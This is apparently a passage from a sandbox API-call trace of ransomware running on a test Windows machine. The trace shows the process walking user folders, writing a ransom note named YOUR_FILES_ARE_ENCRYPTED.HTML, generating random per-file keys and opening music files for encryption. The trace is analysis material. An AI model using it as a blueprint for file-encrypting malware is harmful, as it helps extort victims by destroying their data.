ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x35b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0167.651] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\Downloads.lnk") returned 43 [0167.651] lstrcmpW (lpString1="Downloads.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.651] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0167.651] lstrlenW (lpString=".lnk") returned 4 [0167.651] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0167.651] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad56beb0, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad56beb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad592010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x5fc, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0167.651] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\OneDrive.lnk") returned 42 [0167.651] lstrcmpW (lpString1="OneDrive.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.651] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0167.651] lstrlenW (lpString=".lnk") returned 4 [0167.651] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0167.651] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0167.651] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\RecentPlaces.lnk") returned 46 [0167.651] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.651] PathFindExtensionW (pszPath="RecentPlaces.lnk") returned=".lnk" [0167.651] lstrlenW (lpString=".lnk") returned 4 [0167.651] PathFindExtensionW (pszPath="RecentPlaces.lnk") returned=".lnk" [0167.651] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, 
ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0167.651] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0167.651] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0167.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\links\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0167.652] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0167.654] CloseHandle (hObject=0x5a0) returned 1 [0167.654] GetProcessHeap () returned 0x270000 [0167.654] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0167.655] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0167.655] wnsprintfW (in: pszDest=0x74ea160, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings") returned 38 [0167.655] GetProcessHeap () returned 0x270000 [0167.655] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0167.655] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings" [0167.655] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings\\*" [0167.655] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Local Settings\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bf2eb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0167.655] GetProcessHeap () returned 0x270000 [0167.656] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0167.656] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaea736e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaea736e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Music", cAlternateFileName="")) returned 1 [0167.656] wnsprintfW (in: pszDest=0x74ea160, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music") returned 29 [0167.656] GetProcessHeap () returned 0x270000 [0167.656] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0167.656] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music" [0167.656] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\*" [0167.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaea736e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaea736e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0167.656] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaea736e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaea736e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.656] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf168e9d0, ftCreationTime.dwHighDateTime=0x1d7e77a, ftLastAccessTime.dwLowDateTime=0xbf3d1aa0, 
ftLastAccessTime.dwHighDateTime=0x1d7e77d, ftLastWriteTime.dwLowDateTime=0xbf3d1aa0, ftLastWriteTime.dwHighDateTime=0x1d7e77d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="4KhlAV sb2I", cAlternateFileName="4KHLAV~1")) returned 1 [0167.656] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I") returned 41 [0167.656] GetProcessHeap () returned 0x270000 [0167.656] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.656] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I" [0167.656] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\*" [0167.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf168e9d0, ftCreationTime.dwHighDateTime=0x1d7e77a, ftLastAccessTime.dwLowDateTime=0xbf3d1aa0, ftLastAccessTime.dwHighDateTime=0x1d7e77d, ftLastWriteTime.dwLowDateTime=0xbf3d1aa0, ftLastWriteTime.dwHighDateTime=0x1d7e77d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.657] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf168e9d0, ftCreationTime.dwHighDateTime=0x1d7e77a, ftLastAccessTime.dwLowDateTime=0xbf3d1aa0, ftLastAccessTime.dwHighDateTime=0x1d7e77d, ftLastWriteTime.dwLowDateTime=0xbf3d1aa0, ftLastWriteTime.dwHighDateTime=0x1d7e77d, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.657] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1d4e7b0, ftCreationTime.dwHighDateTime=0x1d7e777, ftLastAccessTime.dwLowDateTime=0x77aa1940, ftLastAccessTime.dwHighDateTime=0x1d7e782, ftLastWriteTime.dwLowDateTime=0x77aa1940, ftLastWriteTime.dwHighDateTime=0x1d7e782, nFileSizeHigh=0x0, nFileSizeLow=0xdf37, dwReserved0=0x0, dwReserved1=0x60, cFileName="5JHGboRpMB Q.mp3", cAlternateFileName="5JHGBO~1.MP3")) returned 1 [0167.657] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3") returned 58 [0167.657] lstrcmpW (lpString1="5JHGboRpMB Q.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.657] PathFindExtensionW (pszPath="5JHGboRpMB Q.mp3") returned=".mp3" [0167.657] lstrlenW (lpString=".mp3") returned 4 [0167.657] PathFindExtensionW (pszPath="5JHGboRpMB Q.mp3") returned=".mp3" [0167.657] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\5jhgborpmb q.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.657] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=57143) returned 1 [0167.657] GetProcessHeap () returned 0x270000 [0167.657] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.660] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="46") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda3a, 
param_2="%02X" | out: param_1="25") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="38") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="2C") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="4E") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="4A") returned 2 [0167.660] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="6D") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="6D") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="E2") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="86") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="0C") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="38") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="1D") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0F") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="D2") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0C") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="27") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="08") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="67") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="70") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="C4") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B6") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="51") returned 2 [0167.661] wsprintfW 
(in: param_1=0x4ebda92, param_2="%02X" | out: param_1="4D") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="A4") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="B5") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="FB") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="12") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="68") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="3B") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="DB") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1B") returned 2 [0167.662] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3" [0167.662] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.662] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.662] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4114f80, ftCreationTime.dwHighDateTime=0x1d7e234, ftLastAccessTime.dwLowDateTime=0x8e5c7140, ftLastAccessTime.dwHighDateTime=0x1d7e74d, ftLastWriteTime.dwLowDateTime=0x8e5c7140, ftLastWriteTime.dwHighDateTime=0x1d7e74d, nFileSizeHigh=0x0, nFileSizeLow=0x12415, dwReserved0=0x0, dwReserved1=0x60, cFileName="do_zPXXY6WZzpCYf02s.wav", cAlternateFileName="DO_ZPX~1.WAV")) returned 1 [0167.662] wnsprintfW (in: pszDest=0x74c2008, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav") returned 65 [0167.662] lstrcmpW (lpString1="do_zPXXY6WZzpCYf02s.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.662] PathFindExtensionW (pszPath="do_zPXXY6WZzpCYf02s.wav") returned=".wav" [0167.662] lstrlenW (lpString=".wav") returned 4 [0167.662] PathFindExtensionW (pszPath="do_zPXXY6WZzpCYf02s.wav") returned=".wav" [0167.662] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\do_zpxxy6wzzpcyf02s.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0167.663] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=74773) returned 1 [0167.663] GetProcessHeap () returned 0x270000 [0167.663] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0167.666] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="F9") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="84") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="67") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="A0") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="C6") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="DD") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="0B") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F7") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | 
out: param_1="DE") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="15") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="56") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="A7") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="FE") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="D4") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="0D") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="25") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E1") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="06") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="C9") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="CC") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="14") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="4B") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="FB") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="35") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="11") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A0") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A5") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="50") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="B4") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="17") returned 2 [0167.667] wsprintfW (in: 
param_1=0x4ebdaae, param_2="%02X" | out: param_1="8D") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="4C") returned 2 [0167.667] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav" [0167.668] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.668] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0167.668] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90165d00, ftCreationTime.dwHighDateTime=0x1d7dddb, ftLastAccessTime.dwLowDateTime=0xe12759b0, ftLastAccessTime.dwHighDateTime=0x1d7e763, ftLastWriteTime.dwLowDateTime=0xe12759b0, ftLastWriteTime.dwHighDateTime=0x1d7e763, nFileSizeHigh=0x0, nFileSizeLow=0xd0e2, dwReserved0=0x0, dwReserved1=0x60, cFileName="f-TsV8zq0u.mp3", cAlternateFileName="F-TSV8~1.MP3")) returned 1 [0167.668] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3") returned 56 [0167.668] lstrcmpW (lpString1="f-TsV8zq0u.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.668] PathFindExtensionW (pszPath="f-TsV8zq0u.mp3") returned=".mp3" [0167.668] lstrlenW (lpString=".mp3") returned 4 [0167.668] PathFindExtensionW (pszPath="f-TsV8zq0u.mp3") returned=".mp3" [0167.668] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV 
sb2I\\f-TsV8zq0u.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\f-tsv8zq0u.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0167.668] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=53474) returned 1 [0167.668] GetProcessHeap () returned 0x270000 [0167.669] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0167.673] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="90") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="0C") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="71") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="7B") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="2E") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="0D") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="59") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="BE") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8A") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="0D") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C4") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AD") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="22") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="30") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C0") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="BB") returned 2 [0167.673] 
